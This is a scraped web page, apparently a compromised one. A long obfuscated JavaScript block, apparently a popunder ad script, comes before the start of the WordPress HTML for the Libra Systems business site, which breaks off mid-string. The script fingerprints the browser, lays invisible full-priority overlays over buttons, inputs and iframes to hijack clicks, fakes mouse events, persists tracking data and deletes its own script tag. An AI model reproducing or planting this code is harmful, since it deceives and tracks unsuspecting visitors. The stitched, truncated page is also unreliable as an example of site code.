ta.Ya(a,b,c)},Me:function(a,b,c,d,e,f){for(;a!=a.top;)a=a.parent,ta.Yb(a,b,c,d,e,f)},ze:function(a){n.o("message",function(b){a(b[b.message?"message":"data"],b.source)},!0,f)},bb:function(a,b){n.o("message",function(c){c.source===a&&b(c[c.message?"message":"data"],c.source)},!0,f)}},Ja="";n.ea(function(){Va.Sb(Wa,function(){try{var a=new window.Fingerprint2.FP2Options;a.exclude.PixelRatio=!0;a.exclude.AdBlock=!0;a.extendedJsFonts= !0;Ja=(new window.Fingerprint2(a)).get()}catch(b){q(p.m,"fp2: "+b)}})});var Sc=function(a){var b=!1;ab()&&(b=!Mc(a||.9));return b}(.9),ud=function(){var a;a=.9;return ab()?Mc(a):window.outerWidth/window.screen.availWidth>a&&window.outerHeight/window.screen.availHeight>a}(),vd=ab(),ac={X:function(a){var b=null,c=td,d=T.X(c);if(d)b=d;else{if((d=m.getElementById("_admvnabb"))&&Gb(d,"script"))b=d;else for(var d=m.getElementsByTagName("script"),e=0;e<d.length;e++)-1<d[e].src.indexOf("tid="+a)&&(b=d[e]); b||(a=f.document.currentScript)&&-1<a.src.indexOf("cloudfront")&&(b=a);T.oa(c,b)}return b},F:function(a){try{var b=this.X(a);b&&(nb(b),T.oa(Rc,"//"+ja(b.src)))}catch(c){q(p.m,"error in removing script: "+c)}},ad:function(a){var b,c=Rc,d=T.X(c);if(d)b=d;else if(a=this.X(a))if(a=a.src)b="//"+ja(a),T.oa(c,b);return b}},R={};D.c=function(){return new D(la(),0)};D.a=function(){return new D(0,0)};D.b=function(a){return a?"string"==typeof a&&(a=a.split("_"),2==a.length)?(a=[parseInt(a[0],10),parseInt(a[1], 10)],isNaN(a[0])||isNaN(a[1])?null:new D(a[0],a[1])):null:new D(la(),0)};D.prototype.c=function(){return[this.b,this.a].join("_")};var wd={1:1,2:2};L.prototype.S=function(a){if(a&&a.length)try{for(var b=[],c=0;c<a.length;c++){var d=a[c];b.push(new cd(d[0],d[1],this))}this.c=b}catch(e){q(p.uc,void 0)}};L.prototype.w=function(a){var b=this.c.length;return this.c[a>=b?b-1:a]};L.prototype.ja=function(a,b,c){var d=this.c;return d&&0<d.length&&(b=this.w(b))&&R[b.a]?a[b.a]:c};L.prototype.C=function(a){return this.a= uc(this,this.M(),a)};L.prototype.P=function(a){return this.b=uc(this,this.D(),a)};L.prototype.K=function(){return this.J+"_ts"};L.prototype.M=function(){return this.J+"_d"};L.prototype.D=function(){return this.J+'_u["'+Nb(window.btoa(location.pathname+(!0===Gc?location.search:"")))+'"]'};L.prototype.cb=function(){this.a.a++;this.b.a++;ca.I.setItem(this.K(),""+this.l.a);ca.I.setItem(this.M(),this.a.c());ca.I.setItem(this.D(),this.b.c())};L.prototype.s=function(){var a=this.ga,b=this.O,c=this.N,d=1E3* this.ia,e=[];this.va();if(!a&&!b&&!c)return[0,0];this.a=this.C(e);this.b=this.P(e);if(1>e.length&&0==this.a.a&&0==this.b.a&&!this.c)return[0,0];if(0<e.length)return[-1,0];e=this.b.b>this.a.b?this.a.b:this.b.b;if(0<e&&e+d<this.l.a)return ca.Xb(this.ha.J),[0,0];(d=this.c)&&0<d.length&&(c=this.w(this.a.a).b);return 0<c&&(e=ca.I.getItem(this.K()),e=parseInt(e,10),isNaN(e)&&(e=this.c?this.R:0),d=this.l.a,c=e+c,this.l.a<c)?[1,c-d||0]:a&&this.a.a>=a?[3,0]:b&&this.b.a>=b?[2,0]:[0,0]};L.prototype.sa=function(){return 0=== this.s()[0]};L.prototype.va=function(){this.l=new dd};xa.prototype.h=function(a,b){this.a[a]=b;return this};xa.prototype.toString=function(){var a=cc(this.a),b;this.l?b=Pc(this.b,Ea(this.c+"?"+a)):(a=Pc(this.b,this.c,a),b=b||4,b=a+=(-1<a.indexOf("?")?"&":"?")+"_"+Ha(b)+"="+la());return b};S.prototype.setItem=function(){var a=window.localStorage.setItem.apply(window.localStorage,arguments);this.length=window.localStorage.length;return a};S.prototype.getItem=function(){return window.localStorage.getItem.apply(window.localStorage, arguments)};S.prototype.clear=function(){var a=window.localStorage.clear.apply(window.localStorage,arguments);this.length=window.localStorage.length;return a};S.prototype.removeItem=function(){var a=window.localStorage.removeItem.apply(window.localStorage,arguments);this.length=window.localStorage.length;return a};S.prototype.key=function(){return window.localStorage.key.apply(window.localStorage,arguments)};V.prototype.setItem=function(){var a=window.sessionStorage.setItem.apply(window.sessionStorage, arguments);this.length=window.sessionStorage.length;return a};V.prototype.getItem=function(){return window.sessionStorage.getItem.apply(window.sessionStorage,arguments)};V.prototype.clear=function(){var a=window.sessionStorage.clear.apply(window.sessionStorage,arguments);this.length=window.sessionStorage.length;return a};V.prototype.removeItem=function(){var a=window.sessionStorage.removeItem.apply(window.sessionStorage,arguments);this.length=window.sessionStorage.length;return a};V.prototype.key= function(){return window.sessionStorage.key.apply(window.sessionStorage,arguments)};W.prototype.removeItem=function(){};W.prototype.setItem=function(){};W.prototype.la=function(){var a=this;this.forEach(function(){a.length++})};W.prototype.key=function(a){var b=null;this.forEach(function(c,d,e){if(e===a)return b=c,!1});return b};W.prototype.getItem=function(a){var b=null;this.forEach(function(c,d){if(a===c)return b=d,!1});return b};W.prototype.clear=function(){var a=this;this.forEach(function(b){a.removeItem(b)})}; Fa.prototype=new W;Fa.prototype.forEach=function(a){for(var b=f.document.cookie.split(";"),c=0;c<b.length;c++){var d=b[c].split("=");if(!1===a(d[0].trim(),d[1],c))break}};Fa.prototype.setItem=function(a,b){this.sd(a,b)};Fa.prototype.sd=function(a,b){f.document.cookie=a+"="+b.toString()+"; expires=Tue Jan 19 2038 00:00:00 GMT";this.la()};Fa.prototype.removeItem=function(a){f.document.cookie=a+"=; expires=Thu, 01 Jan 1970 00:00:01 GMT;";this.la()};ma.prototype=new W;ma.prototype.forEach=function(a){for(var b= f.name.split(";"),c=0;c<b.length;c++){var d=b[c].split("=");if(!1===a(d[0].trim(),d[1],c))break}};ma.prototype.setItem=function(a,b){var c=this.bc();c[a]=b;f.name=this.Ab(c);this.la()};ma.prototype.removeItem=function(a){var b=this.bc();b[a]=null;delete b[a];f.name=this.Ab(b);this.la()};ma.prototype.Ab=function(a){var b=[],c;for(c in a)b.push([c,a[c]].join("="));return b.join(";")};ma.prototype.bc=function(){var a={};this.forEach(function(b,c){a[b]=c});return a};Ia.prototype=new W;Ia.prototype.forEach= function(a){var b=0,c;for(c in this.map)if(!1===a(c,this.map[c],b++))break};Ia.prototype.setItem=function(a,b){this.map[a]=b;this.la()};Ia.prototype.removeItem=function(a){this.map[a]=null;delete this.map[a];this.la()};var ca,xd=z.a("iframe object canvas embed input button".split(" ")),O=[],La=u(),ad=z.a(["embed","object"]);g.s="_novr";g.prototype.ga=function(a){this.url=a};g.prototype.c=function(){return!0};g.prototype.v=function(){};g.prototype.pa=function(a){this.j=a};g.prototype.Ia=function(a){this.A= a};g.prototype.f=function(a,b,c,d){M.Z(wb);na&&0<na.length&&c&&d&&this.ob(na,d,c)};g.prototype.ob=function(a,b,c){function d(a,b){n.Z(n.fd(b,c.screenX,c.screenY,c.clientX,c.clientY),a)}if(g.D(b,a)){var e=function(){d(b,"mouseover");d(b,"mousedown");d(b,"mouseup");d(b,"click")};this.K()?C(function(){e()},50):e()}};g.prototype.U=function(){return this.j.J+"_"+la()};g.prototype.Y=function(){function a(){try{if(!c.s(Sa))return;if(!c.Jb()&&c.A.sa()){clearTimeout(b);for(var d=0;d<O.length;d++)O[d].style.display= "block";return}}catch(f){q(p.m,""+f)}b=C(a,100)}for(var b,c=this,d=0;d<O.length;d++)O[d].style.display="none";b=C(a,100)};g.a=function(a){return a.J};g.b=function(a){return g.a(a)+"_p"};g.l=function(){return db};g.D=function(a,b){var c=!1;0<B.Ea(m.querySelectorAll(b),[a]).length&&(c=!0);return c};g.C=function(){var a="";try{var b=m.querySelector(Eb);if(b&&Gb(b,"a")){var c=b.href;c&&(a=c)}}catch(d){q(p.m,"error in dstl overwrite: "+d)}return a};g.w=function(a){var b="";(a=B.Ba(a,"a"))&&(a=a.href)&& (b=a);return b};g.c=[];g.prototype.Ua=function(a){try{if(f.document.body&&this.A.sa()){var b=this.j,c=g.a(b),d;a:{var e=this.M(),k=this.N;if(!a&&0<A.length){for(var h=m.querySelectorAll(lb),l=[],n=0;n<h.length;n++){var u=h[n].tagName.toLowerCase();(xd.b(u)||e&&e.b(u))&&l.push(h[n])}d=l}else{l=m.querySelectorAll(a||"iframe, object, canvas, embed, input, button");if(J&&0<J.length){var v=m.querySelectorAll(Cb);if(0<v.length){d=B.Vb(l,v);break a}}e=[];for(n=0;n<l.length;n++){var z=l[n];try{k(z)&&e.push(z)}catch(C){q(p.m, "error in checking for no overlay property: "+C)}}var E;if(e&&0<e.length)E=B.Vb(l,e);else{n=[];for(e=0;e<l.length;e++)n.push(l.item(e));E=n}d=E}}for(var D,l=0;l<g.c.length;l++){D=g.c[l];var F;Pa(D)?(F=m.getElementById(D.getAttribute(La)),F||(F=this.za(D,B.xa(D),b),D.setAttribute(La,F.id))):F=D[c];sc(F,D)}for(l=0;l<d.length;l++)this.ha(b,d[l])}}catch(C){q(p.m,""+C)}};g.prototype.a=function(){this.H||(this.H=function(){this.Ua()});this.H()};var Ta=[0,0];n.o("mousemove",function(a){a=a||window.event; Ta=[a.clientX,a.clientY];M.Z(bb,Ta)},!0,f.document);g.prototype.O=function(a){return this.Ja()==a};g.prototype.yb=function(){this.O(1)&&this.A.cb();if(this.rb()){var a=m.elementFromPoint.apply(f.document,Ta);if(a!==f.document)return a}};g.prototype.rb=function(){return ha&&0<ha.length?!0:!1};g.prototype.R=function(){return!0};g.prototype.T=function(a,b){return ib.Aa(a,"/",fa,this,b)};g.prototype.Ja=function(){return wd[Jc]||2};g.prototype.bd=function(a,b){if(a){a.style.display="none";var c=B.ka(b); a.style.display="block";return c}return null};g.prototype.K=function(){return!1};g.prototype.vd=function(a){return 1==a};g.prototype.ya=function(){this.O(2)&&(this.A.cb(),this.Y())};g.prototype.s=function(a){if(0!=a){var b=this.j.a;if(b==Q.Na)return!1;var c=Q.ca;if(1==a&&b==c||-1==a&&b!=c)return!1}return!0};g.prototype.za=function(a,b,c){var d=m.createElement("div");d[g.a(c)]=!0;this.l()&&(d[g.l()]=!0);c=d.style;c.height=b.height+"px";c.width=b.width+"px";c.zIndex="2147483647";"a"==a.tagName.toLowerCase()? c.cursor="pointer":"pointer"==Bb(a,"cursor","cursor")&&(c.cursor="pointer");Pa(a)&&(d.id=u());return d};g.prototype.ha=function(a,b){var c;if(c="padmvpu_ppdf"!=b.id)Pa(b)?(c=b.getAttribute(La),c=m.getElementById(c)):c=b[g.a(a)],c=!(c&&null!=c.parentNode);if(c&&(c=B.xa(b),!(5>c.width||5>c.height)&&B.Cd(b,c))){c=this.za(b,c,a);Pa(b)?b.setAttribute(La,c.id):b[g.a(a)]=c;c[g.b(a)]=b;var d;d=b;if(d.parentNode){for(var e=[d.offsetTop,d.offsetLeft];d.parentNode;){d=d.parentNode;if(d.offsetTop!==e[0]||d.offsetLeft!== e[1])break;e=[d.offsetTop,d.offsetLeft]}d=d.style&&"relative"==d.style.position}else d=!0;d&&80!==ka?(d=c.style,d.top=d.left="0px",d.position="absolute",b.parentNode.appendChild(c)):(g.c.push(b),sc(c,b),f.document.body.appendChild(c));O.push(c)}};g.prototype.pb=function(){for(var a=0;a<O.length;a++)nb(O[a]);O=[];this.fa(!1)};g.prototype.D=function(){return!0};g.prototype.M=function(){return null};g.prototype.Fa=function(a,b){return a&&a[g.a(b)]?!0:!1};g.prototype.Jb=function(){return this.sb||!1}; g.prototype.fa=function(a){this.sb=a};g.prototype.B=function(a){return!(a?a.closed:1)};g.prototype.ab=function(){return!0};g.prototype.C=function(){return f.location.href.replace(/[\t\n\x0B\f\r]+/gm,"")};g.prototype.Eb=function(a){var b="";Eb&&(b=g.C());b||(b=g.w(a));this.S=b};g.prototype.qb=function(){var a=!0;this.s(Sa)||(a=!1);return a};g.prototype.w=function(){return null};g.prototype.b=function(){return[fa,Oa]};g.prototype.ja=function(){return new z};g.prototype.ub=function(){return!0};g.prototype.ia= function(){return 100};g.prototype.l=function(){return!1};g.prototype.P=function(){return!0};g.prototype.N=function(){return!1};var qc=[728,90,350,90,300,250,468,60,250,250,160,600,120,600,120,240,240,400,300,600,670,670,600,270,600,400,125,125,234,60,200,200,336,280,180,150,120,60,800,440,800,600,630,250,630,500,960,330],yd=[426,240,640,360,854,480,1280,720,1920,1080,2560,1440,3840,2160],oc=[4,"download",4,"install",4,"descargar",4,"telecharger",11,"premium",11,"upgrade",5,"vpn",6,"watch",3,"magnet:", 3,".torrent",9,"play"],zd=z.a(["embed","video","object","canvas"]),Ad=z.a("p h1 h2 h3 h4 h5 h6 u b i strong big small label em font".split(" ")),Bd=z.a("form input select option button textarea".split(" ")),kc=[function(a){if(Bd.b(Z(a)))return[7,wa(a)]},function(a){if("a"==Z(a)){var b=wa(a);0==b&&(b=B.Qb(a)?1:2);return[1,b]}},function(a){if("img"==Z(a))return[5,Ya(wa(a),a)]},function(a){if(zd.b(Z(a))){var b=a.getBoundingClientRect();if(Za(b.width,b.height,yd,.2))return[2,9]}if(-1<a.outerHTML.replace(a.innerHTML, "").indexOf("jw-"))return[2,9]},function(a){var b=a.getBoundingClientRect();if(Ad.b(Z(a))||0<a.innerHTML.length&&a.innerHTML==a.innerText)return[4,Ya(wa(a,!0),a)];if(.98<b.width/f.document.documentElement.offsetWidth)return[3,Ya(wa(a),a)]},function(a){var b=a.getBoundingClientRect();if(Za(b.width,b.height,qc,.1)&&10>=lc(a))return[6,8]}],Ma,Y={Zb:function(a,b,c,d,e){a=m.querySelectorAll(a.join(", "));for(var f=0;f<a.length;f++){var g=a[f];g.admaven_pop_ct=b;g.admaven_pop_ctc=c;g.admaven_pop_ctt=d; g.admaven_pop_ddb=e}},rd:function(a){Ma&&M.F(Kb,Ma);for(var b=0;b<a.length;b++)a[b][0]=ic([a[b][0]]);Ma=function(){for(var b=0;b<a.length;b++){var d=a[b];Y.Zb(d[0],d[1],d[2],d[3],d[4])}};M.o(Kb,Ma)},da:{La:0,mb:1,kb:-1},Sc:function(a,b){try{var c=m.elementFromPoint(a.clientX,a.clientY);do{var d=jc(c,b),c=d[0],e=d[1];if(e===Y.da.La)return[d[2],d[3],d[4],d[5]];if(e===Y.da.kb)break;c=c.parentNode}while(e==Y.da.mb);return[0,0,b.b,null]}catch(f){return[0,0,b.b,null]}}},Tc=[[ic(ya("vNtTvfDTnc4GgG8SCwaKCMrJhG8UBwbBAenQoiDqgftRhfmzAenNfkaKB7sJg70KDyxPBMlGnc4LgS8LnxJTByxHCGO0t70SvftVg9VUWcDDnc49CMqXCMlIgfmVhx0TB749geVKhftavNmGg80HCy09ByVNAzmXD7VUh7l9nxJTByxHCGO0t6mZgM0LBywNfn==").split("@")), 6,12]];gb(function(){for(var a=0;a<Tc.length;a++)Y.Zb.apply(null,Tc[a])},500);I.prototype.a=function(){if(this.w)return this.w;var a=this.A.C();return this.A.ja(this.ia,a.a,this.s)};I.prototype.b=function(){var a=this.a();a.Ia(this.A);a.pa(this.j);a.ga(this.url);return a};I.prototype.c=function(a){this.w=a;for(var b in R)a=R[b],a.Ia(this.A),a.pa(this.j),a.Y()};I.prototype.ha=function(a){var b=this;try{a(function(a){a=a||f.event;var d=!1;try{T.zd(Qa);var e=b.b();try{if(a instanceof KeyboardEvent&& !e.R())return}catch(l){}e.Y();if(e.s(Sa)){var k=a.target;if(!e.D()||!(A&&0<A.length&&!b.C(k)||A&&1>A.length&&J&&0<J.length&&b.l(k))){var h=k,u=g.b(b.j);if(!e.l()||!b.R(h,b.j)){h[u]&&(h=k[u]);if(oa&&0<oa.length){var x=b.O(h);x&&b.D(x)}T.oa(yc,h);q(p.Hc,void 0);if(b.P()&&e.c(a)&&(x||b.A.sa())){d=!0;h&&h!==f.document&&(ha&&0<ha.length&&0<B.Ea(m.querySelectorAll(na),[k]).length&&(d=!1),e.Eb(h));q(p.wb,""+a.type);k&&!0===e.Fa(k,b.j)&&q(p.vb,""+a.type);b.url=e.T(b.j);try{q(p.nc,n.Rc(a).join("."))}catch(l){}var v= Y.Sc(a,b.j);b.M(v);x&&b.D(x);var z=e.yb(),C=$a()?"1":"0";q(p.jc,C);var D=p.Ic,E;a:{k=1;try{for(var F=[1,K.a!=Q.ca&&K.a!=Q.Na,$a(),"https:"==f.location.protocol,vd,ud,T.X(sd)],h=0;h<F.length;h++)F[h]&&(k|=1<<h)}catch(l){E=0;break a}E=k}q(D,""+E);e.v(b.N,b.url.toString(),a,z)}d&&(n.yd(a),n.od(a))}}}}catch(l){q(p.m,""+l)}})}catch(c){q(p.m,""+c)}gb(function(){var a=b.b();a&&a.qb()&&(b.b().a(),M.Z(Kb))},b.a().ia());this.b().ub()&&ac.F(b.j.b)};I.prototype.ga=function(a){this.url=a};I.prototype.Ia=function(a){this.A= a};I.prototype.pa=function(a){this.j=a};I.prototype.l=function(a){return hc(Cb,a)};I.prototype.C=function(a){var b=m.querySelectorAll(lb);if(b&&0<b.length){var c=g.b(this.j);a=a&&a[c]?a[c]:a;if(!a||!(0==b.length||1>B.Ea(b,[a]).length))return!0}return!1};I.prototype.O=function(a){for(var b=0;b<oa.length;b++){var c=oa[b];try{var d=parseFloat(c[3]);if(0<d&&hc(c[0],a)&&(1==d||ub(c[3])))return c}catch(e){break}}return null};I.prototype.M=function(a){a[2]&&this.url.h("tid",a[2]);a[3]&&this.url.h("ddb", a[3]);this.url.h("ct",a[0]).h("ctc",a[1])};I.prototype.D=function(a){this.url.h("tid",a[1]);this.url.h("ddb",a[2])};I.prototype.S=function(a,b){this.Ia(a);this.pa(b);var c=R[ka+""];c&&(this.s=c);c=this.a();c.pa(b);var d=b.a;d!=Q.ca&&(c=c.w(d))&&this.c(c)};I.prototype.K=function(){for(var a=this.a().b(),b=0;b<a.length;b++){var c="//"+a[b];try{var d=m.createElement("link");d.rel="preconnect";d.href=c;f.document.getElementsByTagName("head")[0].appendChild(d)}catch(e){}}};I.prototype.P=function(){return ub(Kc)}; I.prototype.R=function(a,b){return!0===a[g.l()]&&!a[g.b(b)]};I.prototype.ja=function(a){var b;b=b||f.document;pd().L(function(c){n.o(c,a,!0,b)});n.ud(a,b)};var $c={Sa:gc(),qd:function(){this.Sa=gc()}},ib={Aa:function(a,b,c,d,e){var g=$a();a=(new xa(c||a.w,b,a.a!=Q.ca)).h("tid",a.b).h("red","1").h("cs",Ea(a.c.Sa)).h("abt",a.a).h("v","1.34.9.1").h("sm",d&&d.id||0).h("k",id()).h("sts",Ic).h("prn",g?"1":"0").h("emb",Sc?"1":"0");f.sessionStorage.getItem("ac")&&a.h("u",f.sessionStorage.getItem("ac"));a.h("fs", 1);(b=kd(Hc))&&a.h("file",b);Db&&(b=jd(Db))&&a.h("subid",b);var h=0;g&&(h|=4);Sc&&(h|=8);e&&e.L(function(a){h|=a});d&&(a.h("ref",d.C()),f.document.referrer&&(e=ja(f.document.referrer).replace(/[\t\n\x0B\f\r]+/gm,""))&&0<e.length&&a.h("osr",e),(e=d.S)&&a.h("dstl",e),d.ja().L(function(a){h|=a}));a.h("jst",h);a.h("enr",0);a.h("lcua",E);try{a.h("tzd",""+-((new Date).getTimezoneOffset()/60))}catch(l){}try{a.h("uloc",""+$b())}catch(l){}try{if(Fb){var n=m.querySelector(Fb);Gb(n,"img")&&a.h("img",n.src)}}catch(l){q(p.m, "error in img extract: "+l)}a.h("if",0);return a},a:function(a){var b=m.createElement("a");b.href=a;return new xa(b.hostname,b.pathname+b.search)}};va.prototype.a=function(a){a=new fc("admaven_pop",Oa,1,Ca,Oa,a);this.$b(a);return a};va.prototype.c=function(a){a=new L(Ac,Bc,a,Dc,Ec);a.S(Fc);return a};va.prototype.l=function(a){return new bd(a)};va.prototype.$b=function(a){ia.j=a};ua.prototype=new va;ua.prototype.a=function(a){a=new Zc(Oa,Ca,Cc,a);this.$b(a);return a};ua.prototype.b=function(){var a= va.prototype.b.apply(this);a.push(cb);return a};var mb=new ua,K=mb.a(Q.Na);Qc||q(p.Ec,void 0);try{Uc()}catch(a){q(p.m,"error in serving method manager invocation: "+a)}}).apply(window,arguments);})("eHgIrjkErdaIqTr5qTk4vct9gfhVCNmLDzqZBMnKAe4MBGsIrjgIrSEEvdY7qdaEvctGheFZBMmHC6VJCyZLA7VKhG4PBMhLsSEEvxJDvdaIeGsKC7JPhzsJribPBeCSvcsKC7JPhzsJhy06BMFLgenJribPBeCSvcsKC7VUhetZCSsIsS4HAemVgMxGscOSvctPBeCKWMVNh6VXqTg6qHg8sSESAe8NvNPPh7D4fHg7qHC7qiaQsV9Ie89IhMxIC7kIhMxIC7kIW69IrcESC7JPhztLD7DZBel3sSESDyx7hft9B6mHge4UvMVKhM1SvcsSvxJDvyhZBzqVvdaIsS1Lhy0LqNb6AesHCe4NDi4TBy08hyhGB749vM4VDcsIriEEvxJDvdaIriEGvcsSvxJDvct9CMVIByVZBNkKAe4MBGsIsTgFpjaFpdCHqSsIe89IrcEEvcsSvdaIrcESsSESsSEFvctJWyZ8WyPKWzxNsSF2XiFBsVnECH9SvcaSkjtyDlUGlNrSvcaSlUDIrytzlj9SvcaSljtyDyqzWyFtixtIhkZmoitDvdaIriEEvctKgfqPBNtLD6tLBS4PBMhLsV9=");
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no"> <meta name="format-detection" content="telephone=no" /> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href=""> <title>Libra Systems &#8211; Greater Profits. Greater Protection</title> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Libra Systems &raquo; Feed" href="https://librasys.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Libra Systems &raquo; Comments Feed" href="https://librasys.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Libra Systems &raquo; Home Comments Feed" href="https://librasys.com/about/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/librasys.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='dashicons-css' href='https://librasys.com/wp-includes/css/dashicons.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp-jquery-ui-dialog-css' href='https://librasys.com/wp-includes/css/jquery-ui-dialog.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='google-web-fonts-css' href='//fonts.googleapis.com/css?family=Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic%7COpen+Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic&#038;ver=5.2#038;subset=latin%2Cgreek%2Ccyrillic%2Cgreek-ext%2Ccyrillic-ext%2Cvietnamese%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://librasys.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://librasys.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0' type='text/css' media='all' /> <link rel='stylesheet' id='pc_google_analytics-frontend-css' href='https://librasys.com/wp-content/plugins/pc-google-analytics/assets/css/frontend.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='https://librasys.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.1.3' type='text/css' media='all' /> <style id='rs-plugin-settings-inline-css' type='text/css'> #rs-demo-id {} </style> <link rel='stylesheet' id='tt-theme-fonts-css' href='//fonts.googleapis.com/css?family=Lato:400,100,300,700,900|Vollkorn:400,400italic&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='https://librasys.com/wp-content/themes/creatify/vendors/bootstrap/css/bootstrap.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-theme-css' href='https://librasys.com/wp-content/themes/creatify/vendors/bootstrap/css/bootstrap-theme.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome-css' href='https://librasys.com/wp-content/themes/creatify/vendors/font-awesome/css/font-awesome.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='owl-carousel-css' href='https://librasys.com/wp-content/themes/creatify/vendors/owl-carousel/owl.carousel.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='owl-carousel-theme-css' href='https://librasys.com/wp-content/themes/creatify/vendors/owl-carousel/owl.theme.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='ionicons-css' href='https://librasys.com/wp-content/themes/creatify/ionicons/css/ionicons.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='kwicks-css' href='https://librasys.com/wp-content/themes/creatify/css/jquery.kwicks.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='tt-theme-stylesheet-css' href='https://librasys.com/wp-content/themes/creatify/style.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://librasys.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.10' type='text/css' media='all' /> <link rel='stylesheet' id='themeton-stylesheet-css' href='https://librasys.com/wp-content/uploads/themeton/creatify.css?ver=5.2' type='text/css' media='all' /> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/pc-google-analytics/assets/js/frontend.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.1.3'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.1.3'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source 